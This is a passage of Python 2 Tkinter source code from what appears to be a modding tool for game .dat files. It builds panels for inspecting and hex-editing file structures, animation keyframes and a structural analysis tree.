emptyWidget = Tk.Frame( relief='flat' ) # This is used as a simple workaround for the labelframe, so we can have no text label with no label gap.
basicDetailsFrame = ttk.Labelframe( Gui.structurePropertiesFrame.interior, labelwidget=emptyWidget, padding=(20, 4) )
ttk.Label( basicDetailsFrame, text=locationText, wraplength=Gui.structPropFrameWrapLength ).grid( column=0, row=0, columnspan=2 )
ttk.Label( basicDetailsFrame, text=fileSizeText, wraplength=Gui.structPropFrameWrapLength ).grid( column=0, row=1, columnspan=2 )
ttk.Label( basicDetailsFrame, text=entriesCountText, wraplength=Gui.structPropFrameWrapLength ).grid( column=0, row=2, columnspan=2 )
basicDetailsFrame.pack( pady=0 )
def showSwordSwingInfo():
""" Treat the Sword Swing Colors struct like a regular struct, and show fields for all of the actual values. """
# Gather data and build a few strings for the GUI
structOffset = globalDatFile.headerInfo['stringTableStart'] + globalDatFile.getStringTableSize() # Relative to data section start
hexData = hexlify( globalDatFile.tailData[:0xC] ).upper()
locationText = 'Location: 0x{:X}'.format( 0x20 + structOffset )
fileSizeText = 'Size: 0xC (12 bytes)'
ttk.Label( Gui.structurePropertiesFrame.interior, text='Sword Swing Colors Struct', font="-weight bold" ).pack( pady=12 )
# Add info; need to encapsulate the file details text in a Frame so that pack and grid don't conflict
emptyWidget = Tk.Frame( relief='flat' ) # This is used as a simple workaround for the labelframe, so we can have no text label with no label gap.
basicDetailsFrame = ttk.Labelframe( Gui.structurePropertiesFrame.interior, labelwidget=emptyWidget, padding=(20, 4) )
ttk.Label( basicDetailsFrame, text=locationText, wraplength=Gui.structPropFrameWrapLength ).grid( column=0, row=0, columnspan=2 )
ttk.Label( basicDetailsFrame, text=fileSizeText, wraplength=Gui.structPropFrameWrapLength ).grid( column=0, row=1, columnspan=2 )
basicDetailsFrame.pack( pady=0 )
# Create a new frame for displaying field names and hex values
hexDisplayFrame = ttk.Frame( Gui.structurePropertiesFrame.interior, padding='0 12 0 12' ) # Left, Top, Right, Bottom.
# Create the first column
ttk.Label( hexDisplayFrame, text='Identifier:' ).grid( column=0, row=0, padx=(0, 7), pady=0, sticky='e' )
ttk.Label( hexDisplayFrame, text='Ending Alpha:' ).grid( column=0, row=1, padx=(0, 7), pady=0, sticky='e' )
ttk.Label( hexDisplayFrame, text='Starting Alpha:' ).grid( column=0, row=2, padx=(0, 7), pady=0, sticky='e' )
ttk.Label( hexDisplayFrame, text='Edge Red Channel:' ).grid( column=0, row=3, padx=(0, 7), pady=0, sticky='e' )
ttk.Label( hexDisplayFrame, text='Edge Green Channel:' ).grid( column=0, row=4, padx=(0, 7), pady=0, sticky='e' )
ttk.Label( hexDisplayFrame, text='Edge Blue Channel:' ).grid( column=0, row=5, padx=(0, 7), pady=0, sticky='e' )
ttk.Label( hexDisplayFrame, text='Center Red Channel:' ).grid( column=0, row=6, padx=(0, 7), pady=0, sticky='e' )
ttk.Label( hexDisplayFrame, text='Center Green Channel:' ).grid( column=0, row=7, padx=(0, 7), pady=0, sticky='e' )
ttk.Label( hexDisplayFrame, text='Center Blue Channel:' ).grid( column=0, row=8, padx=(0, 7), pady=0, sticky='e' )
# Add an editable field for the raw hex data # highlightbackground is the BORDER color when not focused!
hexEntry = Tk.Entry( hexDisplayFrame, width=10, justify='center',
relief='flat', highlightbackground='#b7becc', borderwidth=1, highlightthickness=1, highlightcolor='#0099f0' )
hexEntry.insert( 0, hexData[:8] )
hexEntry['state'] = 'disabled'
hexEntry.grid( column=1, row=0, pady=0, padx=(0,2) )
hexEntry = HexEditEntry( hexDisplayFrame, structOffset+8, 1, 'B', 'Ending Alpha' )
hexEntry.configure( state='disabled' )
hexEntry.insert( 0, hexData[8:10] )
hexEntry.grid( column=1, row=1, pady=0, padx=(0,2) )
hexEntry = HexEditEntry( hexDisplayFrame, structOffset+9, 1, 'B', 'Starting Alpha' )
hexEntry.insert( 0, hexData[10:12] )
hexEntry.grid( column=1, row=2, pady=0, padx=(0,2) )
hexEntry = HexEditEntry( hexDisplayFrame, structOffset+0xA, 1, 'B', 'Edge Color Red Channel' )
hexEntry.insert( 0, hexData[12:14] )
hexEntry.grid( column=1, row=3, pady=0, padx=(0,2) )
hexEntry = HexEditEntry( hexDisplayFrame, structOffset+0xB, 1, 'B', 'Edge Color Green Channel' )
hexEntry.insert( 0, hexData[14:16] )
hexEntry.grid( column=1, row=4, pady=0, padx=(0,2) )
hexEntry = HexEditEntry( hexDisplayFrame, structOffset+0xC, 1, 'B', 'Edge Color Blue Channel' )
hexEntry.insert( 0, hexData[16:18] )
hexEntry.grid( column=1, row=5, pady=0, padx=(0,2) )
hexEntry = HexEditEntry( hexDisplayFrame, structOffset+0xD, 1, 'B', 'Center Color Red Channel' )
hexEntry.insert( 0, hexData[18:20] )
hexEntry.grid( column=1, row=6, pady=0, padx=(0,2) )
hexEntry = HexEditEntry( hexDisplayFrame, structOffset+0xE, 1, 'B', 'Center Color Green Channel' )
hexEntry.insert( 0, hexData[20:22] )
hexEntry.grid( column=1, row=7, pady=0, padx=(0,2) )
hexEntry = HexEditEntry( hexDisplayFrame, structOffset+0xF, 1, 'B', 'Center Color Blue Channel' )
hexEntry.insert( 0, hexData[22:24] )
hexEntry.grid( column=1, row=8, pady=0, padx=(0,2) )
hexDisplayFrame.pack()
def show20XXsupplementalData():
# Gather data and build a few strings for the GUI
structOffset = globalDatFile.headerInfo['stringTableStart'] + globalDatFile.getStringTableSize() # Relative to data section start
locationText = 'Location: 0x{:X}'.format( 0x20 + structOffset )
fileSizeText = 'Size: 0x{:X}'.format( globalDatFile.headerInfo['filesize'] - structOffset )
ttk.Label( Gui.structurePropertiesFrame.interior, text='20XX HP Supplemental Data', font="-weight bold" ).pack( pady=12 )
# Add info; need to encapsulate the file details text in a Frame so that pack and grid don't conflict
emptyWidget = Tk.Frame( relief='flat' ) # This is used as a simple workaround for the labelframe, so we can have no text label with no label gap.
basicDetailsFrame = ttk.Labelframe( Gui.structurePropertiesFrame.interior, labelwidget=emptyWidget, padding=(20, 4) )
ttk.Label( basicDetailsFrame, text=locationText, wraplength=Gui.structPropFrameWrapLength ).grid( column=0, row=0, columnspan=2 )
ttk.Label( basicDetailsFrame, text=fileSizeText, wraplength=Gui.structPropFrameWrapLength ).grid( column=0, row=1, columnspan=2 )
basicDetailsFrame.pack( pady=0 )
def showKnownStructProperties( structure, guiFrame ):
# tic = time.clock()
structValues = structure.getValues()
relativeFieldOffset = 0
absoluteFieldOffset = structure.offset
if structure.entryCount > 1:
entrySize = structure.length / structure.entryCount
else: entrySize = 0
for i, field in enumerate( structure.fields ):
# Collect info on this field
propertyName = field.replace( '_', ' ' )
fieldFormatting = structure.formatting[i+1]
fieldByteLength = struct.calcsize( fieldFormatting )
fieldValue = structValues[i]
# If this is an array or table structure, add a little bit of spacing before each group of field entries
if entrySize and ( relativeFieldOffset % entrySize == 0 ) and i > 0:
verticalPadding = ( 10, 0 )
firstOfNextEntry = True
else:
verticalPadding = ( 0, 0 )
firstOfNextEntry = False
# Add the property/field name, and a tooltip for its struct & file offsets
if field: # May be an empty string if this field is unknown
if firstOfNextEntry and entrySize > 4:
fieldLabel = ttk.Label( guiFrame, text='{} - {}:'.format((relativeFieldOffset/entrySize)+1, propertyName), wraplength=200 )
else:
fieldLabel = ttk.Label( guiFrame, text=propertyName + ':', wraplength=200 )
fieldLabel.grid( column=0, row=i, padx=(0, 7), sticky='e', pady=verticalPadding )
ToolTip( fieldLabel, text='Offset in struct: 0x{:X}\nOffset in file: 0x{:X}'.format(relativeFieldOffset, 0x20+absoluteFieldOffset), delay=300 )
else:
fieldLabel = ttk.Label( guiFrame, text=uHex( relativeFieldOffset ) + ':', wraplength=200 )
fieldLabel.grid( column=0, row=i, padx=(0, 7), sticky='e', pady=verticalPadding )
ToolTip( fieldLabel, text='Offset in file: 0x{:X}'.format(0x20+absoluteFieldOffset), delay=300 )
# Add an editable field for the raw hex data
hexEntry = HexEditEntry( guiFrame, absoluteFieldOffset, fieldByteLength, fieldFormatting, propertyName )
hexEntry.insert( 0, hexlify(structure.data[relativeFieldOffset:relativeFieldOffset+fieldByteLength]).upper() )
hexEntry.bind( '<Return>', updateEntryHex )
hexEntry.grid( column=1, row=i, padx=(0,2), pady=verticalPadding )
# Add something for the decoded value column
if absoluteFieldOffset in globalDatFile.pointerOffsets: # It's a pointer
PointerLink( guiFrame, fieldValue ).grid( column=2, row=i, pady=verticalPadding )
elif 'Flags' in field:
# Add the flag "Decode" button label, and the window creator handler
flagsLabel = ttk.Label( guiFrame, text='Decode', foreground='#00F', cursor='hand2' )
flagsLabel.grid( column=2, row=i, pady=verticalPadding )
flagsLabel.bind( '<1>', lambda e, s=structure, fO=absoluteFieldOffset, vI=i: FlagDecoder(s, fO, vI) )
# Add a color swatch if it's an RGBA color (this shows the color and makes for easy editing)
elif field.startswith( 'RGBA' ):
# Get the individual RGBA values from the field's value
fieldValueHexString = '{0:0{1}X}'.format( fieldValue, 8 ) # Avoids the '0x' and 'L' appendages brought on by the hex() function. pads to 8 characters
hexEntry.colorSwatch = ColorSwatch( guiFrame, fieldValueHexString, hexEntry )
hexEntry.colorSwatch.grid( column=2, row=i, pady=verticalPadding )
else:
# Add an editable field for this field's actual decoded value (and attach the hex edit widget for later auto-updating)
valueEntry = HexEditEntry( guiFrame, absoluteFieldOffset, fieldByteLength, fieldFormatting, propertyName )
valueEntry.insert( 0, fieldValue )
valueEntry.hexEntryWidget = hexEntry
hexEntry.valueEntryWidget = valueEntry
# Bind an event handler (pressing 'Enter' to save)
valueEntry.bind( '<Return>', updateEntryValue )
valueEntry.grid( column=2, row=i, pady=verticalPadding )
relativeFieldOffset += fieldByteLength
absoluteFieldOffset += fieldByteLength
# toc = time.clock()
# print 'time to draw known struct properties:', toc - tic
def showUnknownStructProperties( structure, guiFrame ):
fieldOffset = 0
tableRow = 0
for i in range( len(structure.data) / 4 ):
# Check if this is a pointer, and construct the field name for this property
absoluteFieldOffset = structure.offset + fieldOffset
if absoluteFieldOffset in globalDatFile.pointerOffsets:
hexString = uHex( fieldOffset )
numberOfSpaces = 5 - len( hexString )
fieldName = hexString + numberOfSpaces * ' ' + ' (Pointer):'
else:
fieldName = uHex( fieldOffset ) + ':'
# Add the property/field name, and a tooltip for its file offset
fieldLabel = ttk.Label( guiFrame, text=fieldName )
fieldLabel.grid( column=0, row=tableRow, padx=(0, 7), pady=0, sticky='w' )
ToolTip( fieldLabel, text='Offset in file: 0x{:X}'.format(0x20+structure.offset+fieldOffset), delay=300 )
# Add an editable field for the raw hex data
hexEntry = HexEditEntry( guiFrame, absoluteFieldOffset, 4, None, structure.name )
hexEntry.insert( 0, hexlify(structure.data[fieldOffset:fieldOffset+4]).upper() )
hexEntry.bind( '<Return>', updateEntryHex )
hexEntry.grid( column=1, row=tableRow, pady=0 )
fieldOffset += 4
tableRow += 1
if absoluteFieldOffset in globalDatFile.pointerOffsets: # It's a pointer
fieldValue = structure.getValues()[i]
PointerLink( guiFrame, fieldValue ).grid( column=2, row=i, pady=0, padx=7 )
def showFrameDataStringParsing( frameObjString, structTable, infoPaneInterior ):
# Get some info from the parent struct (a FObjDesc)
parentOffset = frameObjString.getAnyDataSectionParent()
parentStruct = globalDatFile.getStruct( parentOffset )
_, _, startFrame, _, dataTypeAndScale, slopeDataTypeAndScale, _, _ = parentStruct.getValues()
# Create a new frame to attach basic info to (since we want to use grid without interfering with pack)
frameDetailsGrid = ttk.Frame( infoPaneInterior )
ttk.Label( frameDetailsGrid, text='General Track Type:' ).grid( column=0, row=0, sticky='e', padx=(0, 10) )
ttk.Label( frameDetailsGrid, text='Specific Track Type:' ).grid( column=0, row=1, sticky='e', padx=(0, 10) )
# Add the general (and specific) track type
trackNames = frameObjString.identifyTrack()
ttk.Label( frameDetailsGrid, text=trackNames[0] ).grid( column=1, row=0, sticky='w' )
ttk.Label( frameDetailsGrid, text=trackNames[1] ).grid( column=1, row=1, sticky='w' )
# Parse the FObjString
interpolationID, arrayCount, keyFrames = frameObjString.parse()
# Display the opcode's interpolation type and array/keyframe count
ttk.Label( frameDetailsGrid, text='Interpolation:' ).grid( column=0, row=2, sticky='e', padx=(0, 10) )
ttk.Label( frameDetailsGrid, text='Keyframe Count:' ).grid( column=0, row=3, sticky='e', padx=(0, 10) )
ttk.Label( frameDetailsGrid, text=frameObjString.interpolationTypes[interpolationID] ).grid( column=1, row=2, sticky='w' )
ttk.Label( frameDetailsGrid, text=arrayCount ).grid( column=1, row=3, sticky='w' )
# Display the data types used in the string
ttk.Label( frameDetailsGrid, text='Data Type:' ).grid( column=0, row=4, sticky='e', padx=(0, 10) )
ttk.Label( frameDetailsGrid, text='Data Scale:' ).grid( column=0, row=5, sticky='e', padx=(0, 10) )
if interpolationID == 0 or interpolationID == 5:
ttk.Label( frameDetailsGrid, text='Not Used' ).grid( column=1, row=4, sticky='w' )
ttk.Label( frameDetailsGrid, text='Not Used' ).grid( column=1, row=5, sticky='w' )
else:
dataType = dataTypeAndScale >> 5 # Use the first (left-most) 3 bits
dataScale = 1 << ( dataTypeAndScale & 0b11111 ) # Use the last 5 bits
ttk.Label( frameDetailsGrid, text=parentStruct.dataTypes[dataType][0] + 's' ).grid( column=1, row=4, sticky='w' )
ttk.Label( frameDetailsGrid, text='1 / {} ({})'.format(dataScale, 1.0/dataScale) ).grid( column=1, row=5, sticky='w' )
# Display the slope/tangent data types used in the string
ttk.Label( frameDetailsGrid, text='Slope Data Type:' ).grid( column=0, row=6, sticky='e', padx=(0, 10) )
ttk.Label( frameDetailsGrid, text='Slope Data Scale:' ).grid( column=0, row=7, sticky='e', padx=(0, 10) )
if interpolationID == 4 or interpolationID == 5:
slopeDataType = slopeDataTypeAndScale >> 5 # Use the first (left-most) 3 bits
slopeDataScale = 1 << ( slopeDataTypeAndScale & 0b11111 ) # Use the last 5 bits
ttk.Label( frameDetailsGrid, text=parentStruct.dataTypes[slopeDataType][0] + 's' ).grid( column=1, row=6, sticky='w' )
ttk.Label( frameDetailsGrid, text='1 / {} ({})'.format(slopeDataScale, 1.0/slopeDataScale) ).grid( column=1, row=7, sticky='w' )
else:
ttk.Label( frameDetailsGrid, text='Not Used' ).grid( column=1, row=6, sticky='w' )
ttk.Label( frameDetailsGrid, text='Not Used' ).grid( column=1, row=7, sticky='w' )
frameDetailsGrid.pack( pady=(14, 0) )
# Start a new frame for the keyframe data, and create a table header
if len( keyFrames ) < 40: # Avoid loading up the GUI too much; could bog it down. Needs testing
keyFramesFrame = ttk.Frame( infoPaneInterior )
ttk.Label( keyFramesFrame, text='Keyframes / States', font="-weight bold" ).grid( column=0, row=0, columnspan=2 )
ttk.Label( keyFramesFrame, text='Start Frame:' ).grid( column=2, row=1, padx=3 )
ttk.Label( keyFramesFrame, text=startFrame ).grid( column=3, row=1, padx=3 )
ttk.Label( keyFramesFrame, text='Keyframe:' ).grid( column=0, row=2, padx=3 )
ttk.Label( keyFramesFrame, text='Data Value:' ).grid( column=1, row=2, padx=3 )
ttk.Label( keyFramesFrame, text='Slope Value:' ).grid( column=2, row=2, padx=3 )
ttk.Label( keyFramesFrame, text='Target Frame:' ).grid( column=3, row=2, padx=3 )
# Display the keyframe data
frameCount = startFrame
csvFormatText = []
row = 3
for dataValue, tangent, frameWait in keyFrames:
ttk.Label( keyFramesFrame, text=row - 2 ).grid( column=0, row=row )
ttk.Label( keyFramesFrame, text=dataValue ).grid( column=1, row=row )
ttk.Label( keyFramesFrame, text=tangent ).grid( column=2, row=row )
ttk.Label( keyFramesFrame, text=frameCount ).grid( column=3, row=row )
csvFormatText.append( '{}, {}, {}'.format(dataValue, tangent, frameCount) )
frameCount += frameWait
row += 1
# Set the end frame, taken from the grandparent Animation Object
animParentOffset = parentStruct.getAnyDataSectionParent()
animParentStruct = globalDatFile.getStruct( animParentOffset )
endFrame = animParentStruct.getValues( 'End_Frame' )
ttk.Label( keyFramesFrame, text='End Frame:' ).grid( column=2, row=row )
ttk.Label( keyFramesFrame, text=endFrame ).grid( column=3, row=row )
keyFramesFrame.pack( pady=(14, 0) )
else:
ttk.Label( infoPaneInterior, text='Avoiding Full Analysis;\nlarge array length detected.' ).pack( pady=(14, 0) )
csvFormatText = []
for dataValue, tangent, frameWait in keyFrames:
csvFormatText.append( '{}, {}, {}'.format(dataValue, tangent, startFrame) )
# Repackage the data so that it can be collected and used by the user in other ways
csvFormatText = '\n'.join( csvFormatText )
label = ttk.Label( infoPaneInterior, text='Show Keyframes in CSV Format', foreground='#00F', cursor='hand2' )
label.pack( pady=(9, 0) )
label.bind( '<1>', lambda event, message=csvFormatText, title=frameObjString.name + ' Keyframes': cmsg(message, title) )
label = ttk.Label( infoPaneInterior, text='Show Keyframes in TSV Format', foreground='#00F', cursor='hand2' )
label.pack( pady=(3, 0) )
label.bind( '<1>', lambda event, message=csvFormatText.replace(', ', '\t'), title=frameObjString.name + ' Keyframes': cmsg(message, title) )
def onStructureTreeSelect( event ):
""" This is called upon a structure in the Structure Tree being selected.
This will populate the right-hand panel with the structure's name and basic
information (including handlers for clicking on some of them), and will then kick
off a separate function for displaying the structure's values and their offsets. """
# Destroy the existing widgets in the properties frame
Gui.structurePropertiesFrame.clear()
iid = str( Gui.fileStructureTree.selection()[0] )
itemName = Gui.fileStructureTree.item( iid, 'text' )
Gui.structurePropertiesFrame.structTable = None
if itemName == 'File Header':
showFileProperties()
return
elif itemName == 'Relocation Table':
showRelocationTableInfo()
return
elif itemName == 'Root Nodes Table':
showNodeTableInfo( itemName )
return
elif itemName == 'Reference Nodes Table':
showNodeTableInfo( itemName )
return
elif itemName == 'String Table':
showStringTableInfo()
return
elif itemName == 'Sword Swing Colors':
showSwordSwingInfo()
return
elif itemName == '20XX HP Supplemental Data':
show20XXsupplementalData()
return
elif itemName == 'Orphan Structures':
orphanNotes = ( 'Orphan structures are not attached to the file structure tree in the usual way (i.e. having '
'parents that lead all the way up to the root/reference node tables).' )
ttk.Label( Gui.structurePropertiesFrame.interior, text=orphanNotes, wraplength=Gui.structPropFrameWrapLength ).pack( pady=(36,0) )
return
# Get the struct offset and the initialized struct object itself
structOffset = int( iid.split( '/' )[-1] )
structure = globalDatFile.structs[structOffset]
# Display the structure's name and label
ttk.Label( Gui.structurePropertiesFrame.interior, text=structure.name, font="-weight bold" ).pack( pady=(12,0) )
if structure.label:
ttk.Label( Gui.structurePropertiesFrame.interior, text=structure.label, font="-weight bold" ).pack( pady=(3, 0) )
# Add a "button" for help text
helpText = ( 'Offsets shown on the left (for unknown structs) are absolute file offsets. However, keep in mind that pointers '
"shown on the right, the actual values in the file, are relative to the file's data section (meaning they do not "
'account for the 0x20 file header, and will be that much smaller than the actual file offset).\n\n'
'If a structure has multiple parents, it may appear under multiple branches, thus the addition of all branch'
'sizes will be larger than the total file size.' )
addHelpBtn( helpText )
# Gather struct info
structParents = structure.getParents( includeNodeTables=True )
structSiblings = structure.getSiblings()
structChildren = structure.getChildren()
# Add general struct info; need to encapsulate these in a Frame so that pack and grid don't conflict
emptyWidget = Tk.Frame( relief='flat' ) # This is used as a simple workaround for the labelframe, so we can have no text label with no label gap.
basicDetailsFrame = ttk.Labelframe( Gui.structurePropertiesFrame.interior, labelwidget=emptyWidget, padding=(20, 4) )
# Get the structure depth
if iid.startswith( 'orphans' ):
structDepthText = 'N/A'
else:
depth = structure.getStructDepth()
if depth:
fileDepth, siblingIndex = depth
structDepthText = '{}, {}'.format( fileDepth, siblingIndex )
else: # Failsafe; not expected
structDepthText = str(getTreeviewDepth( Gui.fileStructureTree, iid )) + ', n/a'
# General Struct Info, column 1 (parents/sibs/children text)
ttk.Label( basicDetailsFrame, text='Parents:' ).grid( column=0, row=0, sticky='e', padx=(0, 5) )
ttk.Label( basicDetailsFrame, text='Siblings:' ).grid( column=0, row=1, sticky='e', padx=(0, 5) )
ttk.Label( basicDetailsFrame, text='Children:' ).grid( column=0, row=2, sticky='e', padx=(0, 5) )
# General Struct Info, column 2 (parents/sibs/children info/links)
if structParents:
structParentsString = ', '.join([ uHex(0x20+offset) for offset in structParents ])
parentsCountLabel = ttk.Label( basicDetailsFrame, text=len(structParents), foreground='#00F', cursor='hand2' )
#showBtn = ( 'Show', showStructInStructuralAnalysis(targetStructOffset) )
parentsCountLabel.bind( '<1>', lambda event, message=structParentsString, title=structure.name + ' Parents': cmsg(message, title) )
else:
parentsCountLabel = ttk.Label( basicDetailsFrame, text='0' )
if structSiblings:
structSiblingsString = ', '.join([ uHex(0x20+offset) for offset in structSiblings ])
siblingsCountLabel = ttk.Label( basicDetailsFrame, text=len(structSiblings), foreground='#00F', cursor='hand2' )
siblingsCountLabel.bind( '<1>', lambda event, message=structSiblingsString, title=structure.name + ' Siblings': cmsg(message, title) )
else:
siblingsCountLabel = ttk.Label( basicDetailsFrame, text='0' )
if structChildren:
structChildrenString = ', '.join([ uHex(0x20+offset) for offset in structChildren ])
childrenCountLabel = ttk.Label( basicDetailsFrame, text=len(structChildren), foreground='#00F', cursor='hand2' )
childrenCountLabel.bind( '<1>', lambda event, message=structChildrenString, title=structure.name + ' Children': cmsg(message, title) )
else:
childrenCountLabel = ttk.Label( basicDetailsFrame, text='0' )
parentsCountLabel.grid( column=1, row=0, sticky='w' )
siblingsCountLabel.grid( column=1, row=1, sticky='w' )
childrenCountLabel.grid( column=1, row=2, sticky='w' )
# General Struct Info, column 3 (size/position text)
ttk.Label( basicDetailsFrame, text='Length:' ).grid( column=2, row=0, sticky='e', padx=(20,5) )
ttk.Label( basicDetailsFrame, text='Struct Depth:' ).grid( column=2, row=1, sticky='e', padx=(20,5) )
if structChildren:
ttk.Label( basicDetailsFrame, text='Branch Size:' ).grid( column=2, row=2, sticky='e', padx=(20,5) )
# General Struct Info, column 4 (size/position info)
structLengthText = uHex( structure.length ) if structure.length != -1 else 'Unknown'
ttk.Label( basicDetailsFrame, text=structLengthText ).grid( column=3, row=0, sticky='w' )
ttk.Label( basicDetailsFrame, text=structDepthText ).grid( column=3, row=1, sticky='w' )
# Branch Size Info
if structChildren:
if structure.branchSize == -1: # Not yet known; leave it up to the user to begin calculation
def calculateBranchSize( event ): # This can take some time (5-10 seconds), so lets not make it happen automatically
branchSize = uHex( structure.getBranchSize() )
branchSizeValueLabel['text'] = branchSize
branchSizeValueLabel['foreground'] = Gui.globalFontColor
branchSizeValueLabel['cursor'] = ''
branchSizeValueLabel = ttk.Label( basicDetailsFrame, text='[Calculate]', foreground='#00F', cursor='hand2' )
branchSizeValueLabel.grid( column=3, row=2, sticky='w' )
branchSizeValueLabel.bind( '<1>', calculateBranchSize )
else:
ttk.Label( basicDetailsFrame, text=uHex(structure.branchSize) ).grid( column=3, row=2, sticky='w' )
if structure.entryCount != -1:
paddingNotice = ttk.Label( basicDetailsFrame, text='Entry Count: {}'.format(structure.entryCount) )
paddingNotice.grid( column=0, row=3, columnspan=4, pady=(0, 0) )
if structure.padding:
paddingNotice = ttk.Label( basicDetailsFrame, text='Trailing Padding: 0x{:X}'.format(structure.padding) )
paddingNotice.grid( column=0, row=4, columnspan=4, pady=(0, 0) )
basicDetailsFrame.pack( pady=(16, 0) )
# Nothing else to show for raw image and palette data blocks
if issubclass( structure.__class__, hsdStructures.DataBlock ) and not structure.__class__ == hsdStructures.FrameDataBlock:
return
elif structure.length > 0x1000:
print 'struct is > 0x1000 bytes. skipping struct unpacking.' # This would be slow
return
# Build a table showing the fields and values in this structure
Gui.structurePropertiesFrame.structTable = structTable = ttk.Frame( Gui.structurePropertiesFrame.interior, padding='0 12 0 12' ) # Left, Top, Right, Bottom.
if structure.__class__ == hsdStructures.FrameDataBlock:
showFrameDataStringParsing( structure, structTable, Gui.structurePropertiesFrame.interior )
elif structure.fields:
showKnownStructProperties( structure, structTable )
else:
if structure.padding != 0:
print 'Non-0 padding for unknown struct; {}. Something may have initialized improperly.'.format( structure.padding )
showUnknownStructProperties( structure, structTable )
structTable.pack()
def addSingleStructure( structure, structIid, parentIid, makeExpanded=False ):
# Add this struct if it hasn't already been added
if not Gui.fileStructureTree.exists( structIid ):
# Check if this is a stage file General Point, to modify the name shown
structName = ''
fileDepth, siblingId = structure.getStructDepth()
if fileDepth == 4 or fileDepth == 5:
iidParts = structIid.split( '/' )
if len( iidParts ) > 3: # Failsafe
potentialGeneralPointArrayOffset = int( iidParts[3] )
potentialGeneralPointArray = globalDatFile.getStruct( potentialGeneralPointArrayOffset )
if potentialGeneralPointArray.__class__ == hsdStructures.MapGeneralPointsArray:
if fileDepth == 4 and structure.__class__ == hsdStructures.JointObjDesc:
structName = 'General Points'
elif fileDepth == 5:
structName = structure.getGeneralPointType()
if not structName:
structName = 'General Point'
# Formulate the struct name
if not structName:
if structure.label:
structName = structure.label
else:
structName = ' '.join( structure.name.split()[:-1] ) # Removes just the offset from the name (it's already in the GUI and thus redundant here)
if siblingId != 0:
structName += ' ' + str( siblingId + 1 )
Gui.fileStructureTree.insert( parentIid, 'end', iid=structIid, text=structName, values=uHex(0x20 + structure.offset), open=makeExpanded )
Gui.fileStructureTree.allIids.append( structIid )
elif makeExpanded: # The item has already been added; make sure it's open
Gui.fileStructureTree.item( structIid, open=True )
def addSiblingStructures( structure, parentIid ):
for sibOffset in structure.getSiblings():
sibStruct = globalDatFile.getStruct( sibOffset )
sibIid = parentIid + '/' + str( sibOffset )
addSingleStructure( sibStruct, sibIid, parentIid )
def addChildStructures( structure, parentIid ):
for childOffset in structure.getChildren():
childStruct = globalDatFile.getStruct( childOffset, structure.offset )
childIid = parentIid + '/' + str( childOffset )
addSingleStructure( childStruct, childIid, parentIid )
def addTreeFragment( parentIid, structure=None, structOffset=-1, parentOffset=-1, structDepth=None ):
""" Adds part of a family or local node group to the treeview, including the initial item or structure given.
If the target struct will be visible, this also adds the target structure's siblings and children.
If a structure is not provided, structOffset is required. """
if not structure:
structure = globalDatFile.getStruct( structOffset, parentOffset, structDepth )
#print 'adding struct', structure.name, ' parents:', structure.getParents(), hex(0x20+parentOffset)
assert structure, 'Unable to create or get a structure for ' + uHex(0x20+structOffset)
# Add the target struct
newStructIid = parentIid + '/' + str( structure.offset )
addSingleStructure( structure, newStructIid, parentIid )
# If this item will be visible (i.e. the parent item is open), its siblings and children should be present
if Gui.fileStructureTree.item( parentIid, 'open' ):
addSiblingStructures( structure, parentIid )
addChildStructures( structure, newStructIid )
def growStructuralAnalysisTree( event, iid=None ):
""" This function initializes and adds lower-level structures to an already existing item in
the Structural Analysis treeview. The item given or clicked on to trigger this is expected
to already have its children created (but not necessarily the childrent's siblings, to
improve performance), which means this will mostly just be adding its grandchildren. """
if not iid:
iid = str( Gui.fileStructureTree.selection()[0] )
if iid == '-32': return # The header was clicked on; everything at this level has already been added
# Add all siblings for the children of the item that was clicked on
for childIid in Gui.fileStructureTree.get_children( iid ):
childOffset = int( childIid.split( '/' )[-1] )
childStruct = globalDatFile.structs[childOffset]
addSiblingStructures( childStruct, iid )
# Re-iterate over the treeview children, which will now include siblings
for childIid in Gui.fileStructureTree.get_children( iid ):
childOffset = int( childIid.split( '/' )[-1] )
childStruct = globalDatFile.structs[childOffset]
# Add the children of the current child (grandchildren to item clicked on),
# so that the current child will show a '+' icon and can subsequently be browsed.
addChildStructures( childStruct, childIid )
adjustSavColumnWidth( iid )
def addParentStructures( structOffset, parentOffset=-1, structDepth=None, initialCall=False ):
""" Recursively identifies parent structures, and adds them to the treeview, until the target struct can be added.
This works by working its way up the file structure tree towards the root/ref node tables, and then processing
those higher-level structures first. This ensures higher confidence in identifying lower branches. """
# Prevent a ton of redundant tree attachments
existingEntity = globalDatFile.structs.get( structOffset )
if isinstance( existingEntity, hsdStructures.EnvelopeObjDesc ):
return
# Get the closest upward relative (parent or sibling) to this structure; either from an existing struct, or by scanning the file's pointers.
if existingEntity and not isinstance( existingEntity, (str, hsdStructures.structBase) ): # Found a known struct, not a hint or generic struct
parentStructOffsets = Set( existingEntity.getParents(True) ) # Need to make a copy of this set, since we don't want to modify the original
else:
parentStructOffsets = Set()
for pointerOffset, pointerValue in globalDatFile.pointers:
if pointerValue == structOffset:
offset = globalDatFile.getPointerOwner( pointerOffset, offsetOnly=True )
parentStructOffsets.add( offset )
# Ensure there's something to add (and it's not recursive)
if not parentStructOffsets or parentStructOffsets == [structOffset]:
# Add the Orphan root element in the treeview if it doesn't already exist
if not Gui.fileStructureTree.exists( 'orphans' ):
Gui.fileStructureTree.insert( '', 'end', iid='orphans', text='Orphan Structures', values='' )
print 'Skipped adding branch to struct', uHex(0x20+structOffset), 'because it seems to be an orphan'
return
# Remove key structure offsets from the set, to avoid recursively adding this struct to itself,
# or to the root/ref node tables (those structs will already be added, or it's a label reference)
parentStructOffsets.difference_update( [structOffset, globalDatFile.headerInfo['rtEnd'], globalDatFile.headerInfo['rootNodesEnd']] )
if not parentStructOffsets: return
# Enter a recursive loop to add all parent structs, all the way up to the root or reference nodes tables (this could be a unique branch)
for offset in parentStructOffsets:
addParentStructures( offset )
# At this point on, we are executing for the highest level parent (1st-level/root structs) first, so we can actually initialize the structures now
structure = globalDatFile.getStruct( structOffset, parentOffset, structDepth )
if not initialCall:
if isinstance( structure, hsdStructures.EnvelopeObjDesc ):
#print 'Found inf. matrix array; canceling AFTER addParentStructures call'
return
# Find all instances of this structure's parents in the treeview, and add the new structure to each of them
for parentIid in getStructureIids( parentStructOffsets ):
# Check if this parent is a sibling of the current struct, to know whether to open it and add more structs
thisParentOffset = int( parentIid.split( '/' )[-1] )
parentIsSibling = structure.isSibling( thisParentOffset )
# The current structure will have been added by the true parent's 'grow' call, so we can skip siblings
if not parentIsSibling:
Gui.fileStructureTree.item( parentIid, open=True )
growStructuralAnalysisTree( None, parentIid )
def clearStructuralAnalysisTab( restoreBackground=False ):
# Add or remove the background drag-n-drop image
if restoreBackground:
